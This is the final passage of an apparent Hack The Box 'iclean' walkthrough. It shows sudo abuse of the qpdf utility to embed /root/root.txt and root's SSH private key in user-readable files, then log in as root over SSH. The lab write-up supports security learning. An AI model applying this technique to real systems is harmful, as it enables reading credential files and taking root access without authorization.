</code></pre></div></div> <blockquote> <p><strong><em>The <code class="language-plaintext highlighter-rouge">qpdf</code> binary is a program and C++ library for structural, content-preserving transformations on PDF files.</em></strong></p> </blockquote> <p>The usage help menu gives some clues about the utility.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>consuela@iclean:~<span class="nv">$ </span>qpdf <span class="nt">--help</span><span class="o">=</span>usage
Read a PDF file, apply transformations or modifications, and write
a new PDF file.

Usage: qpdf <span class="o">[</span>infile] <span class="o">[</span>options] <span class="o">[</span>outfile]
   OR  qpdf <span class="nt">--help</span><span class="o">[={</span>topic|--option<span class="o">}]</span>

- infile, options, and outfile may be <span class="k">in </span>any order as long as infile
  precedes outfile.
- Use <span class="nt">--empty</span> <span class="k">in </span>place of an input file <span class="k">for </span>a zero-page, empty input
- Use <span class="nt">--replace-input</span> <span class="k">in </span>place of an output file to overwrite the
  input file with the output
- outfile may be - to write to stdout<span class="p">;</span> reading from stdin is not supported
- @filename is an argument file<span class="p">;</span> each line is treated as a separate
  command-line argument
- @- may be used to <span class="nb">read </span>arguments from stdin
- Later options may override earlier options <span class="k">if </span>contradictory

Related options:
  <span class="nt">--empty</span>: use empty file as input
  <span class="nt">--job-json-file</span>: job JSON file
  <span class="nt">--replace-input</span>: overwrite input with output

For detailed <span class="nb">help</span>, visit the qpdf manual: https://qpdf.readthedocs.io
</code></pre></div></div> <p>After reading the <a href="[GitHub%20-%20qpdf/qpdf:%20QPDF:%20A%20content-preserving%20PDF%20document%20transformer](https://github.com/qpdf/qpdf)">documentation</a>, it seems there is an option to add a file to an empty pdf and convert it a <code class="language-plaintext highlighter-rouge">qdf</code> format, which would typically be used to debug or analyse the inner details of a legitimate pdf.</p> <p>As the user can run the binary as <code class="language-plaintext highlighter-rouge">sudo</code>, this can be exploited to exfiltrate data that would otherwise be inaccessible to the <code class="language-plaintext highlighter-rouge">consuela</code> user.</p> <h2 id="exfiltrating-sensitive-data">Exfiltrating sensitive data</h2> <p>For example, the following command has appended the <code class="language-plaintext highlighter-rouge">root</code> flag from <code class="language-plaintext highlighter-rouge">/root/</code> to a new file that is accessible to the current user.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>consuela@iclean:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/qpdf <span class="nt">--empty</span> /tmp/test.txt <span class="nt">--qdf</span> <span class="nt">--add-attachment</span> /root/root.txt <span class="nt">--</span>
consuela@iclean:~<span class="nv">$ </span><span class="nb">cat</span> /tmp/test.txt | <span class="nb">grep</span> <span class="nt">-A</span> 30 <span class="s2">"root"</span>
&lt;SNIP&gt;
</code></pre></div></div> <p>But that’s too easy. The <code class="language-plaintext highlighter-rouge">admin</code> user’s <code class="language-plaintext highlighter-rouge">id_rsa</code> file could also be exfiltrated:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>consuela@iclean:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/qpdf <span class="nt">--empty</span> /tmp/id_rsa <span class="nt">--qdf</span> <span class="nt">--add-attachment</span> /root/.ssh/id_rsa <span class="nt">--</span>
consuela@iclean:~<span class="nv">$ </span><span class="nb">cat</span> /tmp/id_rsa | <span class="nb">grep</span> <span class="nt">-A</span> 10 <span class="s2">"BEGIN"</span> /tmp/id_rsa
<span class="nt">-----BEGIN</span> OPENSSH PRIVATE KEY-----
b3BlbnNzaC1&lt;SNIP&gt;
<span class="nt">-----END</span> OPENSSH PRIVATE KEY-----
endstream
endobj
consuela@iclean:~<span class="err">$</span>
</code></pre></div></div> <p>Taking the key and adding it to a file with <code class="language-plaintext highlighter-rouge">chmod 600</code> permissions</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/credentials]
└─<span class="nv">$ </span>nano id_rsa_admin
┌──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/credentials]
└─<span class="nv">$ </span><span class="nb">chmod </span>600 id_rsa_admin
┌──<span class="o">(</span>emdeh㉿kali<span class="o">)</span>-[~/Documents/htb-machines/iclean/credentials]
└─<span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa_admin root@capiclean.htb
Welcome to Ubuntu 22.04.4 LTS <span class="o">(</span>GNU/Linux 5.15.0-101-generic x86_64<span class="o">)</span>
&lt;SNIP?
root@iclean:~# <span class="nb">pwd</span>
/root
root@iclean:~# <span class="nb">ls
</span>root.txt  scripts
root@iclean:~# <span class="nb">cat </span>root.txt
33e5361&lt;SNIP&gt;
</code></pre></div></div> <p>And the root flag is found.</p> </div> </article> <br> <hr> <br> <ul class="list-disc pl-8"></ul> <h2 class="text-3xl font-semibold mb-4 mt-12">Enjoy Reading This Article?</h2> <p class="mb-2">Here are some more articles you might like to read next:</p> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2024/headleass-walkthrough/">Headless - XSS, Command Injection, and Sudo abuse.</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2024/hospital-walkthrough/">Hospital - Insecure File Uploads, Business Email Compromise, and kernel exploits.</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2024/devvortex-walkthrough/">Devvortex - Unauthenticated Information Disclosure and password re-use.</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2024/codify-walkthrough/">Codify - Arbitraty code execution and stealing hashes.</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2024/bizness-walkthrough/">Bizness - Authentication bypass and SSRF.</a> </li> </div> </div> </div> </div> <footer class="fixed-bottom"> <div class="container mt-0"> © Copyright 2024 . Powered by <a href="https://jekyllrb.com/" target="_blank" rel="external nofollow noopener">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio" rel="external nofollow noopener" target="_blank">al-folio</a> theme. Hosted by <a href="https://pages.github.com/" target="_blank" rel="external nofollow noopener">GitHub Pages</a>. </div> </footer> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script src="/assets/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@4/imagesloaded.pkgd.min.js"></script> <script defer src="/assets/js/masonry.js" type="text/javascript"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.8/dist/medium-zoom.min.js" integrity="sha256-7PhEpEWEW0XXQ0k6kQrPKwuoIomz8R8IYyuU1Qew4P8=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js?7b30caa5023af4af8408a472dc4e1ebb"></script> <script defer src="/assets/js/bootstrap-toc.min.js?c82ff4de8b0955d6ff14f5b05eed7eb6"></script> <script defer src="https://unpkg.com/bootstrap-table@1.22.1/dist/bootstrap-table.min.js"></script> <script src="/assets/js/no_defer.js?d633890033921b33e0ceb13d22340a9c"></script> <script defer src="/assets/js/common.js?acdb9690d7641b2f8d40529018c71a01"></script> <script defer src="/assets/js/copy_code.js?c9d9dd48933de3831b3ee5ec9c209cac" type="text/javascript"></script> <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script> <script async src="https://badge.dimensions.ai/badge.js"></script> <script type="text/javascript">window.MathJax={tex:{tags:"ams"}};</script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js"></script> <script defer src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script> <script async src="https://www.googletagmanager.com/gtag/js?id=G-JZNPNDMG9P"></script> <script>function gtag(){window.dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-JZNPNDMG9P");</script> <script type="text/javascript">function progressBarSetup(){"max"in document.createElement("progress")?(initializeProgressElement(),$(document).on("scroll",function(){progressBar.attr({value:getCurrentScrollPosition()})}),$(window).on("resize",initializeProgressElement)):(resizeProgressBar(),$(document).on("scroll",resizeProgressBar),$(window).on("resize",resizeProgressBar))}function getCurrentScrollPosition(){return $(window).scrollTop()}function initializeProgressElement(){let e=$("#navbar").outerHeight(!0);$("body").css({"padding-top":e}),$("progress-container").css({"padding-top":e}),progressBar.css({top:e}),progressBar.attr({max:getDistanceToScroll(),value:getCurrentScrollPosition()})}function getDistanceToScroll(){return $(document).height()-$(window).height()}function resizeProgressBar(){progressBar.css({width:getWidthPercentage()+"%"})}function getWidthPercentage(){return getCurrentScrollPosition()/getDistanceToScroll()*100}const progressBar=$("#progress");window.onload=function(){setTimeout(progressBarSetup,50)};</script> </body> </html>